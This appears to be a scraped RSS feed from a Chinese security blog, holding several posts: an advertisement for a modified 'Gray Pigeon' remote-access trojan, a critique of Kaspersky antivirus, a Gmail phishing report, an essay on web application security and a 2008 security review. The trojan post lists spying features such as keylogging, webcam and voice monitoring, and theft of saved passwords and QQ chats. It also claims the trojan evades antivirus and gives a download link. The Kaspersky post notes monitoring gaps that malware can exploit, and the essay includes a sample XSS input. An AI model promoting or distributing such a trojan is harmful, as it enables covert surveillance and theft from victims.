http://www.hnqw.net/ zh-cn PBlog2 v2.4 http://www.hnqw.net/images/logos.gif http://www.hnqw.net/ 倩网工作室 http://www.hnqw.net/article.asp?id=417 hnqw0898@vip.qq.com(admin) Tue,06 Jan 2009 19:35:06 +0800 http://www.hnqw.net/default.asp?id=417 倩网语：宝宝大哥修改的极品！下来玩玩！寻找没有后门鸽子的朋友可以下来玩咯！

软件名称：灰鸽子宝宝功能增强版
软件类型：国外软件 / 英文中文 / 压缩软件
应用平台：2000/XP/2003
大小: 3337728 字节
修改时间: 2009年1月1日, 15:04:41
MD5: C0BC55E8069F2BB5ED0E630F1971DF4D
SHA1: 310CDF3BDA09E6F2DEA60BD4B90D4A8D0FF66694
CRC32: 9576957C
软件介绍：
为减少程序打包大小，已经祛除了自带的IP数据库（QQWry.DAT）如有必要请自己下载个纯真数据库转移到本程序DAT目录即可！

功能更新和本程序初步介绍：
【1】远程文件管理，可以对远程主机文件进行复制、粘贴、删除，重命名、远程运行等,可以断点或覆盖模式上传下载文件或文件夹,可以远程压缩文件进行下载后解压，或者本地压缩文件后上传到远程主机解压，操作简单易用。
【2】远程管理命令，查看远程系统信息、进程管理、窗口管理、服务管理！
【3】捕获屏幕：不但可以连续的捕获远程电脑屏幕，还能把本地的鼠标及键盘传动作送到远程实现实时操纵功能！
【4】视频查看，可以查看远程摄像头！
【5】模拟dos和telnet(超级终端)。
【6】注册表模拟器：远程注册表操作就像操作本地注册表一样方便!
【7】命令广播：可以对自动上线主机进行命令广播，如关机、重启、打开网页，筛选符合条件主机等，点一个按钮就可以让N台远程机器同时执行指定操作！
【8】本地FTP架设，让你的电脑可以作为FTP服务器！
【9】多种自动上线方式：FTP文件读取、DNS解析域名、固定IP等，用户自由选择！
【10】本地WEB架设，让你的电脑可以作为WEB服务器！
【11】远程主机转借功能，可以让你把远程主机转借到其他指定IP和端口和进行操纵。
【12】服务端智能检测安装模式。
【13】流畅的语音监控功能。
【14】Sock5代理功能
【15】控制端支持大量主机上线
【16】加入中文键盘记录功能
【17】加入系统历史密码记录查看功能
【18】加入QQ聊天记录查询下载功能
【19】修正程序在2000系统中时常报错的一个BUG
【20】优化鸽子服务端生成后的大小！
【21】为了方便免杀，将生成功能全部该为本地生成！
【22】更多更能正在添加和优化当中欢迎您前来提建议！

【服务端配置方法】：

1. (固定IP和自定义端口)   例如  127.0.0.1:8000  

2. (动态域名和自定义端口) 例如  www.xdadmin.com:8000

3. (FTP空间网页上线)      例如  http://你的域名/ip.txt

【注意】：本程序下面所有目录(包括程序)请勿改动！否则会导致灰鸽子程序中部分功能无法使用或者蓝屏！

下载地址：http://yuqian4872.ys168.com/       远程控制区]]> http://www.hnqw.net/article.asp?id=416 hnqw0898@vip.qq.com(admin) Sun,04 Jan 2009 11:07:57 +0800 http://www.hnqw.net/default.asp?id=416 倩网语：本人倾向于使用NOD32，主要是因为卡巴在俺的老爷机上很难正常使用，这文章说了些卡巴的不足之处，但是感觉还是有点过激了，因为，没有真正适用于用户的完全智能防护软件，谁敢打保票用他的杀软不中毒？

      卡巴斯基在中国已经成为了一款被过度神话的杀毒软件。尤其是那些在中国的数量巨大的“卡饭”们，对卡巴斯基更是有着无与伦比的盲目崇拜，杀毒就用卡巴斯基，他们把卡巴斯基视作杀毒软件的不二之选，这些伪高手们将自己对卡巴斯基的崇拜四处传扬，最终，卡巴斯基被捧成了一个神话，笼罩上了虚幻的光环。这光环是如此强烈，以致于在卡巴斯基被曝出一个又一个缺点，一次又一次误杀事件时，他们仍然将其奉若神明，对其缺点视而不见。然而正如所有神话都是虚构的一样，卡巴斯基的神话也是完全经不起推敲的。卡巴斯基这样一个在俄罗斯本国都称不上是第一的杀毒软件能够达到这样神乎其神的高度吗？显然不能。这里，就让我们来打破卡巴斯基的神话，去掉卡巴斯基虚幻的光环，还卡巴斯基以真实。

卡巴斯基的世界第一的神话

       卡巴斯基的技术水准是相当高的，单从某些方面评论，卡巴斯基的引擎代表着业界最高水准，但是并不是全部。卡巴斯基是一款相当好的杀毒软件，但他从来算不上世界第一。哪怕是在它的老家俄罗斯，它的杀毒技术是否第一都值得怀疑。不少人认为，俄罗斯的杀毒软件中，技术最厉害的其实是Dr.Web，就是鼎鼎有名的“大蜘蛛”，这是俄罗斯军方和国家安全部门使用的杀毒软件,不以商业化为主，而且病毒库也不是很适合普通用户，所以名气不如卡巴斯基，但就杀毒引擎技术来说，卡巴斯基恐怕是难以望其项背了。事实上，尽管卡巴斯基的技术的确极为优秀，但卡巴斯基连一线厂商都算不上，与赛门铁克，迈克菲，趋势科技等这些属于第一阵营的安全厂商相比，卡巴斯基顶多算是二线厂商中的翘楚罢了。即便在中国而言，卡巴斯基的在个人用户市场中所占份额也是少得可怜。而如果拿杀毒软件市场的大头，企业级市场来说，卡巴斯基企业版的表现则更为拙劣，市场份额几可忽略不计。

       卡巴斯基习惯以令人眼花缭乱的奖项认证等来炫耀自己的技术实力，那么就让我们再来看最近几次国际权威的杀毒软件评测的结果，这可是在卡巴斯基的官方网站上它绝对不会公布出来的。在今年五月的AV-Test测试中，卡巴斯基仅获得第六名;而在卡巴斯基一向引以为豪的VB100测试中这次也不幸折戟;而在AVC测试中，卡巴斯基仅得到最低等级的Standard评级，其成绩更是惨不忍睹。卡巴斯基的世界第一，只不过是一个笑话。

下面，我们就将具体地分析一下卡巴斯基杀毒软件的一些主要缺点，让大家对它有更全面的了解。

卡巴斯基存在的缺点 :  
1 过分依赖病毒库

       卡巴斯基的杀毒引擎采用了单一形式的规则判断，遇见病毒时的启动非常快，在文件标识比对病毒库的时候被认为有着很好的性能，充分利用了处理器的处理能力。卡巴斯基的病毒库非常的庞大，目前已经达到了30万，而且其病毒库与引擎结合的也非常好，卡巴斯基庞大的病毒库及快速的升级频率，使得卡巴斯基所使用的传统的特征码杀毒技术有着相当不错的表现。这是卡巴斯基强势的地方，但也是卡巴斯基的缺陷所在。卡巴斯基太过依赖其病毒库了，但现阶段，病毒具有更新快，加壳多的特点，传统的特征码查杀病毒方式已经无法应对病毒快速的自我更新和自我保护，这使得卡巴斯基对未知病毒的防护能力极为不佳。虽然卡巴斯基一直宣传自己的启发式杀毒技术捕获未知病毒能力是如何强大，但这其实只是个笑话。在今年五月进行的，以对未知病毒的侦测及防护能力检测为主的AVC测试中，卡巴斯基仅达到了9%的主动侦测率，而主动侦测率最高的AntiVir达到了71%，两者相差不可以道里计。

2 薄弱的监控能力

       卡巴斯基的后台监控能力很弱，这是不可否认的。卡巴斯基监控注册表确实监控得很全，而且还监控服务之类的，但开始菜单里的启动文件夹它竟然没监控。而它在监控远程线程代码注入时也只对IE等进程进行提示，从而使人可以注入Winlogon，继而感染文件实现自启动。而且，它监控加载驱动也监控得并不全，使得恶意程序仍有不少漏洞可钻。

       卡巴斯基监控能力弱，这使得病毒容易进入用户电脑，但幸好卡巴斯基有着强大的杀毒能力，这才能把病毒杀灭。而且，因为卡巴斯基的监控能力较差，所以卡巴斯基需要定期强制进行全盘扫描，不仅费时间，而且影响硬盘寿命。而与之相反，杀毒能力并不比卡巴斯基强的迈克菲，正是因为其强大的实时监控能力，便能列于世界一流杀毒软件之列。感染病毒后再杀除，仅靠监控能力便将病毒拒之门外，这两者相比，孰高孰低？相信读者自然一望便知。

3 卡吧死机

       卡巴斯基对系统资源的占用很大是一个一直便为用户诟病的缺点，“卡吧死机”，便是曾受过卡巴斯基占资源之苦的用户们给出的最形象的称号。虽然卡巴斯基推出的6.0版称资源占用问题已得到了解决，但实际成效似乎并不大。还有一些卡饭宣称，通过优化设置，可以解决系统资源占用过大的问题，但是事实上你可以尝试一下，在一台纯净的系统上安装卡巴斯基后，不管你怎么优化，只要主监控打开，你就会系统资源占用程度的飞涨。

       卡巴斯基的卡并不只表现在资源占用上。卡巴斯基在查杀较大压缩包文件真可用漫长来形容，扫描压缩、镜像文件有时还会卡住，而其全盘扫描时间花费也太长，而装了卡巴斯基后系统启动非常慢这点，更是不少用户普遍反映的问题，百度中搜索“卡巴斯基 系统启动慢”一下，你就能找到三千五百多条。  

4 误杀之王的传说

       卡巴斯基的误杀率之高与它的“卡”一样知名。用户戏称卡巴斯基是“宁可错杀一千，不可放走一个”，还有“伤敌一千，自损八百”，虽然这夸张了点，但足以表明卡巴斯基的误杀是如何的严重。而且，卡巴斯基没有得到微软提供的操作系统的相关核心代码，这使得其杀毒软件的稳定性并不很高。有时当系统文件被病毒感染后，卡巴斯基并不能只是将恶意代码分离出来进行清除，而且它也没有提供隔离功能，只好连系统文件一齐杀掉，于是不少用户哀呼，用卡巴斯基杀完毒，系统也进不了了。

       前不久，因为卡巴斯基误杀瑞星卡卡助手事件，瑞星批露出了卡巴斯基半年来的22次重大误杀事件，如此多次数的严重误杀，实在让人目瞪口呆。而其中甚至有卡巴斯基5.0误报卡巴斯基6.0简体中文版安装包为木马的情况，大水冲了龙王庙，自家人不识自家人，着实让人哭笑不得。但瑞星的批露似乎并没有对卡巴斯基起到多大的警戒作用，卡巴斯基似乎变本加厉。在误杀了瑞星的卡卡助手后，卡巴斯基接着把金山的清理专家当作了广告程序，而江民杀毒软件不幸沦为了色情代码，短短一月之内，国内三大安全厂商都不幸惨遭毒手。而就在前几天，卡巴斯基又误杀了系统注册表文件。瑞星指责卡巴斯基为“误杀之王”，看来这的确不仅仅只是传说。  

5 卡巴斯基的漏洞

       卡巴斯基软件本身的漏洞也是极多的，其中最知名也最简单的一个漏洞恐怕就是著名的修改时间漏洞了。卡巴斯基要想正常运行，首先要对用户的key文件进行校验，看是否过期。而卡巴斯基校验key的合法性是通过本地时间来校验，系统时间一旦被病毒修改，key文件立即失效，从而导致卡巴斯基无法正常使用。这是很早便有的一个漏洞，但卡巴斯基似乎并没打算去解决这个问题。所以不少病毒便利用这个漏洞修改用户系统时间已达到让卡巴斯基失效的目的，所以如果哪天你发现你的卡巴斯基没有正常运行的话，请看看你的系统时间吧，如果你发现你回到了二十年前，三十年前，恭喜你，你中招了。

       对于卡巴斯基5.0，曾有高手撰文系统地指出了其中存在的设计漏洞，称其在杀毒软件里使用了许多不安全的技术。而前不久，不少使用卡巴斯基6.0的用户发现，他们无法正常上网，某种情况下卡巴斯基会中断用户与WEB网站的连接，从而导致WEB页面打不开。而6月份，更有高手指出，卡巴斯基6.0和 7.0都有漏洞，可导致系统崩溃。


二 更多的真实

       上面这些是卡巴斯基比较严重的一些问题，但这并不是全部。事实上，我们很容易的就列举出了卡巴斯基的三十多条缺点，这些缺点存在于卡巴斯基的病毒查杀能力，软件功能及兼容性等各个方面。

神话的诞生

       就国内杀毒软件个人用户市场占有率而言，据相关统计，瑞星占据单机版60%多市场，江民和金山各占15%左右，而卡巴斯基在个人杀软市场绝对不足 10%。那么为什么卡巴斯基会在国内受到如此高的推崇而几乎到达了神话般的地步呢？原因就在于卡巴斯基的用户多是一些学生，还有不少自以为精通计算机的所谓高手。这些人的人数虽然远远少于瑞星金山江民等的用户数，但是，这些人混迹于各大论坛，网站的比例却多得多。而卡巴斯基也的确算得上还是一款相当不错的杀毒软件，况且，几乎是免费的，于是口口相传，人云亦云，而且俄罗斯的编程技术水平高是人所共知的，再加上“外国的月亮比中国的圆”这种对国外技术盲目崇拜的心理，于是对卡巴斯基的推崇之风就这样散扬开来，三人成虎，何况这些人还不只三人。正是这样，口碑传播的市场传播方式使得卡巴斯基拥有了不少的用户。但是，在这一次次的宣扬传播之中，卡巴斯基的能力也逐渐被夸大，最终卡巴斯基的神话也便这样诞生。  

放纵盗版是一种推广手段

       说到卡巴斯基，也许很多卡巴斯基的用户都把它当作免费杀毒软件来看。的确，在卡巴斯基的用户中，真正用的是自己花钱买来的正版软件的，只怕一成也没有，绝大部分用户用的都是网上以前随处可找到卡巴斯基的免费的盗版key文件。而前不久卡巴斯基和奇虎360安全卫士的合作，算是卡巴斯基在中国的市场推广活动之一，而且也确实为卡巴斯基带来了不少用户，但这些用户使用的也是只可以使用半年的免费的key。卡巴斯基中国区负责人去年底宣布，从2007年开始，将对全球约600万盗版用户进行封杀，这足以说明卡巴斯基的盗版情况是多么严重。那么，难道说是卡巴斯基一直以来没有发现盗版现象的严重吗？难道是说卡巴斯基没有能力防止盗版么？恐怕不是。盗版是卡巴斯基的有意放纵，卡巴斯基对此视而不见，正是出于培育市场的考虑，而前不久与360的合作，也是基于此目的。如果说口碑传播使卡巴斯基得以建立其品牌形象，那么放纵盗版则是卡巴斯基市场推广手段中的杀手锏。

       而现在，网早已撒下，到了收网的时候了。卡巴斯基今年宣传的最多的是什么？除了正版，还是正版，打击盗版正是卡巴斯基今年的宣传主题。卡巴斯基前不久大批封Key，正是其打击盗版的一大致命举措。这和微软倒是有异曲同工之妙，微软以前对盗版也是睁之眼闭之眼，但最近也开始搞什么Windows正版认证了么？当然，无论是微软还是卡巴斯基，他们的行为都无可厚非，在商言商，毕竟作为一款商业软件，追求利益是理所当然的。但是，当卡巴斯基不再免费的时候，你还会选择卡巴斯基吗？

       当然，如果你是卡巴斯基盗版用户之一的话，你暂时还不必着急，因为卡巴斯基知道它的用户中大部分都是盗版用户，如果逼得急了，这些用户自然会弃之而去。正如收网要慢慢收，否则收得急了鱼儿就会跑掉一样，卡巴斯基也不敢封得太过厉害，相信你仍然还可以免费享用卡巴斯基的服务一段相当长的时间。

态度决定一切

       曾经执教过国足的“神奇教练”米卢，尽管他未能让蹩脚的国足神奇起来，但他有句话却道出了一个真理：态度决定一切。这个道理拿来放到杀毒软件行业来说，同样极为适用。

       事实上，如今各大杀毒软件厂商的技术都已发展得较为成熟，各大杀毒软件厂商之间的技术水平相差并没有多大。在AV-Test测试中我们可以看到，卡巴斯基达到了97.64%的检测率，这个成绩仅排第六;而国产的瑞星杀毒软件在此次测试中也达到了96.02%，取得第十名的成绩，可以看出，卡巴斯基也仅比国产的瑞星高出了那么微乎其微的百分之一多点，如果测试样本中来源于中国地区的病毒样本更多点，恐怕国产软件的表现还会更好一些。那么，在技术水平相差并不多的情况下，什么才是决胜市场的关键？这就是优秀的服务态度。但是卡巴斯基中国有着优秀的服务态度么？没有，他们还来不及考虑这一点，因为他们还在忙着打击盗版。

       为什么卡巴斯基中国的服务如此为人诟病？因为卡巴斯基根本便不怎么重视中国市场，他们并不重视中国用户的权益，没有好的态度，如何能提供良好的服务？

卡巴斯基中国的现状

       卡巴斯基并不重视中国市场，并非是说卡巴斯基不想重视中国市场，他不可能对中国偌大一个市场毫不在乎，但是目前卡巴斯基的确算不上有什么重视中国市场的举措。甚至其实所谓卡巴斯基中国都是不存在的，卡巴斯基在中国只有个销售机构，顶多有个只能负责做点汉化的所谓技术机构——这种事情俄罗斯人可干不了，而在中国设立病毒研究中心，那更是遥远的将来都不一定会发生的事情。事实上，目前卡巴斯基杀毒软件的在中国的市场销售、宣传传播等，都是卡巴斯基在中国的总代理数字星空打理着一切，卡巴斯基中国只是一个名义上的主导者而已。

令人诟病的本地化

       正如人们谈到中国的情况时，常常会使用“有中国特色的”这一词一样，中国互联网的病毒木马等也是极具中国特色的。本地化不足，这是诸多国外杀毒软件厂商在中国都会面临的问题，卡巴斯基自然也不例外。卡巴斯基在中国本地化极为不力，它在中国没有病毒研究中心，这导致其对中国国内突发性病毒响应不及时。卡巴斯基在中国几乎没有服务机构，问问使用卡巴斯基的朋友，就知道他们遇到问题时都是发邮件是给卡巴斯基的俄罗斯总部。顺便说一句，卡巴斯基总部的服务相当不错，至少是有信必回的。病毒爆发时，卡巴斯基并不能及时响应，而且也不为中国用户提供解决办法。便以前不久的爆发的“AV终结者”为例，国内安全厂商很快便纷纷给出了解决方案，而卡巴斯基却从未对此为用户提供任何解决办法。卡巴斯基在中国从来没有出过专杀工具，因为它宣称卡巴斯基杀毒能力强，无需专杀工具，但却不知道卡巴斯基在俄罗斯和欧洲等地都发布过各种专杀工具这又该怎么解释？

       我们先前提到卡巴斯基在中国几乎没有服务机构，为什么说几乎呢，这是因为卡巴斯基后来增加了在中国增设了升级服务器，前不久又开通了400服务电话。为什么卡巴斯基作出这些举措？我们来回顾一下。先谈卡巴斯基中国服务器的架设，大家一直要求卡巴斯基在中国架设服务器，方便广大用户升级。在台湾地震海底光缆中断事件后，由于卡巴斯基以前在国内没有服务器，结果地震后，卡巴斯基用户升级非常不方便，开始卡巴斯基中国还说不会架设升级服务器，后来国内一些杀毒软件厂商推出了免费使用服务，结果卡巴斯基中国坐不住了，为了保住其在中国得之不易的市场走，所以卡巴斯基才不得不架设了中国服务器，并推出地震专用key。接着是400服务电话的开通。前一段诺顿和卡巴斯基误杀Windows系统文件事件，让卡巴斯基中国意识到加强本土服务的重要性，诺顿正是本土服务意识不到，在这次事件中形象损失极大，所以后来诺顿宣布在中国成立安全响应中心，而卡巴斯基则推出了400服务电话。我们可以看出，无论是在中国架设升级服务器还是开设400服务电话，其实卡巴斯基都是在不得已之下作出的举措，这是与其它厂商竞争的结果。当然，我们希望市场应该多一些竞争，因为无论怎么样，这对广大消费者来说，都是好事。  

蔑视中国用户

       在这里，我们不得不再次提到卡巴斯基最近一系列的误杀情况。自从卡巴斯基误杀瑞星卡卡事件，瑞星曝光卡巴斯基半年内22次重大误杀后，卡巴斯基中国的确信守承诺，至少表面上没再作出任何评论，它只是在“一切为用户安全”的原则下，先是误杀了金山清理专家，接着又称江民、Adobe Reader 8为“色情程序”，然后卡巴斯基的合作盟友迅雷也被当作木马下载器惨遭毒手，而近日，卡巴斯基则又将系统注册表误当作木马。

       当然，卡巴斯基是并不承认“误杀”的，他们只承认“误报”，他们说“在卡巴斯基提出威胁警告后，用户可以根据自己的知识、经验或任何其它理由自主的决定是‘删除’还是‘跳过’这些威胁。是否‘查杀’某个软件由用户来决定，如果用户非常确信运行某个软件或进行某个操作不会产生任何威胁，卡巴斯基欢迎用户将其提交给卡巴斯基的病毒分析中心，并将由病毒分析工程师对其进行重新分析评估”。这完全是个笑话，“如果用户非常确信运行某个软件或进行某个操作不会产生任何威胁”，真是用户都能非常确信吗，能有多少用户能够知道卡巴斯基前天刚误杀的regedit.exe是系统注册表文件呢？

       为什么一贯号称在欧美的杀毒产品评测中“误报率极低”或“误报率为零”的卡巴斯基杀毒软件，却在中国出现如此之多的重大误杀事件？而且在被瑞星指责为“误杀之王”后，卡巴斯基的误杀却更是变本加厉？事实上，从卡巴斯基在回应误杀瑞星卡卡、回应误杀Windows XP系统文件的态度就可以看出，卡巴斯基对自己的误杀并没有任何反省，它根本就不重视中国用户的权益。他们为了追求快速的升级频率，忽视了针对中国市场的基本的测试工作，从而误杀频频自然也是难免。而且，卡巴斯基对自己的误杀不仅不去反省，反而是一味抵赖，甚至表面上表示不屑于口水战，背地里却不顾承诺，在新浪等博客里对竞争对手进行打击报复，如此行径，实在可耻可笑。

       事实上，卡巴斯基在中国最大的问题不是技术问题，也不是盗版问题，而是服务态度问题。卡巴斯基现在需要做的不是打击盗版，而是端正服务态度，提高对中国互联网病毒的关注，深耕中国，服务中国用户，这样卡巴斯基才能在中国取得进一步的发展。中国的市场是庞大的，如果只想圈钱，不想服务中国用户，恐怕等卡巴斯基的免费Key封完的时候，也就是卡巴斯基退出中国市场的时候了。

让我们打破神话 认清真实

       神话总是美好的，真实却往往是残酷的，这也是人们为什么喜欢神话而不肯面对真实的原因之一。人们需要神话，神话后的卡巴斯基也许能够化解网民们对电 脑病毒的恐惧，但是神话却并不能帮助你免除电脑病毒的侵扰。也许上面所说的这些事实让你不敢相信，也许你会觉得上面这些似乎有些夸张，你从不认为卡巴斯基 会存在如此之多的问题，但是你仔细地看下去，你会发现你不得不承认这些都是事实。是的，与荣耀的光环相比，真实往往显得这样伤痕累累，苍白无力。当卡巴斯 基神话的外衣被剥下来后，我们便已看到它其是也有着满是缺点的真实。金无足赤，人无完人。卡巴斯基的确是一款优秀的杀毒软件，但却不是最优秀的杀毒软件， 它也并不如宣称的那样完美，它同样存在着很多很多的缺点。

    所以，如果你正使用着卡巴斯基的话，希望你也能清楚地认识到它的不足。你仍然要警惕，你还是可能遭到病毒的侵袭。而且，你更得当心，当下一次卡巴斯基的杀猪声响起时，这是否又是它的一次误报？

]]> http://www.hnqw.net/article.asp?id=415 hnqw0898@vip.qq.com(admin) Sun,04 Jan 2009 11:06:16 +0800 http://www.hnqw.net/default.asp?id=415
　　据悉，这种令人震惊的钓鱼计划得以披露，完全得益于匿名人士提供的相关细节。在他们的电子邮件中，收件人收到了一个真实合法的谷歌日历邀请，不过却是以某个杜撰的事情来出现的。一旦点击参加该项“行动计划”，收件人将会看到如下部分信息，以表示谷歌的盛情邀请：

　　THIS Email is from Gmail Customer Care and we are sending it to every Gmail Email User Accounts Owner for safety. we are having congestions due to the anonymous registration of Gmail accounts so we are shutting down some Gmail accounts and your account was among those to be deleted.We are sending you this email so that you can verify and let us know if you still want to use this account.

　　大意是讲，谷歌为了广大用户安全，将会对部分匿名注册的电子邮件帐户进行销户处理。因此，如果你想继续使用谷歌提供的邮件功能的话，需要提供一些信息以进行确认。

　　另外一个冒充谷歌的痕迹就是使用了不恰当的词语“congestion”(拥塞)。

　　欺骗者使用“Customer Varifaction”创建Gmail帐户，旨在窃取其全权证书。然后，以谷歌自身的邀请函名义，帮助插入收件人的真实姓名。

　　精明的用户可能不会跌入这种陷阱，但是，却也够费心思的了。你要一直保持警惕，仔细甄别谷歌的真伪，甚至会让你考虑是否要删除一些人的电子邮件帐户。其实，这件事提醒了谷歌应该找到一种更有效的方法，警惕个人设立客户服务地址。
]]> http://www.hnqw.net/article.asp?id=414 hnqw0898@vip.qq.com(admin) Sun,04 Jan 2009 11:05:03 +0800 http://www.hnqw.net/default.asp?id=414 安全漏洞中，其实所蕴含安全问题本质往往只有几个。 我个人把Web应用程序安全性本质问题归结以下三个部分：

1、输入/输出验证(Input/output validation)

2、角色验证或认证(Role authentication )

3、所有权验证(Ownership authentication)

说到这，读者一定想知道我这三种分类与形形色色的安全性问题有什么关系？下面我逐个给您概略解答：

输入/输出验证

这里的输入与输出其实都是发生在用户界面（User Interface）这一个层面上的，比如：你某一站点上提交一份注册信息，往往会收到诸多提示：“用户名非法”，“姓名不能使用英文“……其实这就是输入验证的一个实例。什么情况是输出呢？比如说你成功提交一份注册信息后，系统会返回一个确认页（Registerred Confirmation），往往在这个页面上会显示你注册时提交的部分或全部信息，那么在这里显示的信息就是我所说的输出实例之一，输入需要做什么验证？

假如你在提交时，在Address那一栏输入：

{script}alert("iwebsecurITy");{/script}

当你到达注册的确认页时，会有什么发生？如果确认页没有做输出验证处理，那很显然会在到达确认页的时候出现一个Javascript打出的提示框。其实这就是跨sITe脚本攻击的一个小小的实例。当然了，单纯的输入／输出验证涉及的面可能够写一小本书了，努力在后续文章中给大家详解。

角色验证或认证

我们就拿CSDN来说吧，用户有这些角色：其一可以说是游客，就是浏览者没有登录时的角色；其二是免费的注册用户；或许将来CSDN深入发展了，业务有所更新，还会出现收费的注册用户。以上只是用户角色，那在CSDN公司内部还会有管理员角色，还有可能管理员又可以根据板块分为各种不同的角色。大家看到了吧，你天天访问的CSDN一共可能有多少角色？接下来的问题就是权限问题了，为什么会有角色？就是为了控制权限的。每种角色都有自己特定的与公共的权限，这些权限的逻辑关系是相当复杂的，如果一个Web应用在角色上没有一个详细的合理的设计，将会给开发人员带来无限痛苦和麻烦。那现在我要问几个问题：你能保证每种角色只能做其份内的事儿？你是如何去保证的呢？方法可靠吗？有没有漏洞？……这，就是我要说的角色验证或认证。BTW：为什么我会说验证或认证呢？你可以这么理解，角色性存在于两个阶段，其一进入阶段，比如你登录的那一瞬间，你进入了一个特定的角色；另一个阶段就是维持阶段，你如何确保你登录后总是以登录时的身份在操作呢？那前者可以说是：认证，后者就是验证了。

给一个角色认证／验证方面的虚拟案例，比如：一个在线电影服务提供商，会免费给您开一个试用角色，如果这试用角色验证不当，可能会导致用户权限提升而成为一个合法的收费用户，而这个收费用户你往往却收不到他的任何费用。

所有权验证

这个问题的存在也是基于角色的，只不过它所关心的是同级别的角色之间的权限问题。就拿CSDN来说吧，我是CSDN的一个免费用户，你也是。

现在的问题是：我可以替你操作吗，我可以替你发表文章吗？我能修改你的个性设置吗？如果不能，CSDN是如何实现的？虽然你和我都是普通用户，但是你有你的隐私我也有我的隐私，如何保证严格的所有权验证就显得尤为关键了。比较简单吧，这就是我所说的所有权验证。

我可以很自信的告诉你，只要是Web应用安全性问题，它逃不出在这三大部分，可能你还无法把形形色色的Web应用安全性问题与这三个部分对应并合理的解释清楚，但是确实只有这么简单的几个部分。

]]> http://www.hnqw.net/article.asp?id=413 hnqw0898@vip.qq.com(admin) Thu,01 Jan 2009 14:22:15 +0800 http://www.hnqw.net/default.asp?id=413 安全意义非凡，这一年我国成功举办了举世瞩目的奥运盛会，信息安全在奥运盛会中得到了升华;同样是这一年病毒木马呈现井喷式增长趋势，据统计2008年互联网上共出现了1300多万种病毒，这无疑对用户的信息安全构成了巨大挑战;也同样是这一年，中国信息安全出现了许多新的名词，云安全、万兆、多核不断出现在用户的眼前。中国信息安全在2008年的经历如此丰富，这其中一定有许多记忆值得我们回味。

　　安全挑战无处不在

　　·病毒/木马威胁加剧

　　2008年，病毒木马继承了07年快速增长的势头，据国内信息安全厂商瑞星11月份报告统计显示，2008年的前10个月，互联网上共出现新病毒9306985个，是去年同期的12.16倍，木马病毒和后门程序之和超过776万，占总体病毒的83.4%，病毒数量呈现出了井喷式爆发。

　　是什么造成了病毒木马的J曲线增长?经济利益的驱使首当其冲;其次，病毒木马的机械化生产加速了新变种的产生;最后，大量出现的系统及第三方应用程序漏洞为病毒木马传播提供了更广泛的途径。

　　事实证明，借助病毒木马牟利的黑色产业链已经形成，作为企业IT管理者必须对新形势下的病毒木马威胁提高警惕。

　　·安全漏洞频繁曝光

　　2008年安全漏洞被曝光的频率及数量比以往都要多。微软在2008年，史无前例的一年发布了两次紧急漏洞更新补丁。更为严重的是下载工具、浏览器、甚至杀毒软件也被曝出了严重的安全漏洞。

　　业界通常有这样一个估算方式，每1000行代码中大约有5-50个BUG。Windows XP大约有4千万行代码，那么按此公式，XP至少含有120万个BUG。然而，随着越来越多的功能被添加到应用程序和操作系统中，软件在不断更新中变得更加复杂。因此，我们有理由相信，随着漏洞挖掘技术及漏洞提交机制的完善，将会有更多的安全漏洞将会公布于众。

　　与此同时，越来越的攻击正在利用未知漏洞在疯狂传播，“零日攻击”已经成为近几年最热门的话题。实现“主动-自动”的安全防御需求正在成为用户对安全企业更加严格的要求。

　　2008年上半年，十大安全漏洞：

　　浏览器漏洞、Adobe Flash漏洞、ActiveX漏洞、SQL注入式攻击、Adobe Acrobat阅读器漏洞、CMS漏洞、Apple QuickTime漏洞、Web2.0元素(如Facebook应用、网络广告等)、Realplayer漏洞和DNS缓存漏洞等。

　　·数据泄露

　　数据泄露在2008年真正成为企业头疼的问题。随着企业基于web的业务模式全面展开，越来越多的企业关键数据被互联网所承载。企业需要保证数据的高可用性，同时企业也不得不面临各种各样针对数据的安全威胁。根据国家计算机病毒应急处理中心的分析报告，2007年全国计算机病毒感染率已经高达91.5%，其中相当部分已经被黑客控制。Websense安全实验室最新报告也显示，29%的恶意攻击中包含数据窃取程序，这表明攻击者已经将窃取核心机密数据和信息作为其主要目标。2008年，利用Web2.0技术，发动大面积中奖网络钓鱼攻击、网络诈骗和借助热点新闻事件所发起的攻击以及层出不穷的数据泄露事件成为企业关注的重点。

　　强调保护敏感数据的“数据中心”策略已成为业内热捧的发展趋势。同时我们看到，企业急需来对敏感数据进行定义并且采取相应的标记，掌控企业数据的动向。



　　·Web安全不容忽视

　　随着互联网技术的快速发展，综合以上各个方面，基于web的安全威胁在2008年给信息安全构成了巨大挑战。

　　互联网用户飞速增长，基于Web方式的攻击成为黑客首选攻击方式。一方面，网站广告、流量带来的巨大利益诱惑促使新兴网站不断增多，而这些网站又通常都是缺乏严格管理和安全防护，这让黑客可以轻易的利用XSS跨站脚本攻击、SQL注入、DNS投毒等方式对访问这些站点的用户进行攻击;另一方面，随着Web2.0网站的流行，让用户可以自己不断的更新现有内容、共享应用程序，并通过多种渠道进行即时通讯，这也为黑客在“知名”网站下进行恶意代码的传播提供了更好的伪装。

　　与此同时，大多数的用户并没有充分意识到当前Web安全威胁和风险对企业安全的巨大影响，有很多用户都在不知不觉中容忍着各种间谍软件、傀儡程序、键盘记录软件、广告软件在主机上运行，为企业带来巨大的安全风险和经济风险。

　　web安全事件的严重性，已经引起了各方的高度关注，如何防范web安全威胁是用户对信息安全厂商提出的新的课题。

　需求加速安全创新

　　现在，清楚了2008年信息安全面临的各种挑战，也清楚了企业的安全需求。作为信息安全防护的动力源，安全厂商是如何来应对挑战的?回顾热闹的2008年，我们发现了安全企业通过采用新的架构，融入新技术，为企业信息安全建设提供了更多的选择。用户的需求正在催化信息安全技术快速创新。

　　·终端安全防护

　　终端是企业实现大部分业务操作的工具。不幸的是，电脑终端面对安全威胁显得越来越脆弱。调查显示70%的企业安全隐患来自于终端，这些安全威胁包括钓鱼攻击，垃圾邮件，病毒，蠕虫，Root工具包，按键记录程序和其它恶意软件。终端也已扩大了用户的安全考虑范畴，这使得安全威胁防不胜防。事实上，终端很可能就是企业安全防线最薄弱的环节。

　　07年11月赛门铁克宣布推出Symantec Endpoint Protection 11.0和Symantec Network Access Control 11.0，作为其Security 2.0计划中的重要一步。Symantec Endpoint Protection 11.0 将 Symantec AntiVirus 与高级威胁防御功能相结合，可以为终端设备提供可靠的恶意软件防护能力。如今赛门铁克最新的 Endpoint Protection 11.0 MR3在单代理、单控制台中无缝集成了基本安全技术，将准入控制与其他安全技术结合在一起，只需要简单授权即可为终端提供所需的八大防护功能，而且有助于降低成本。

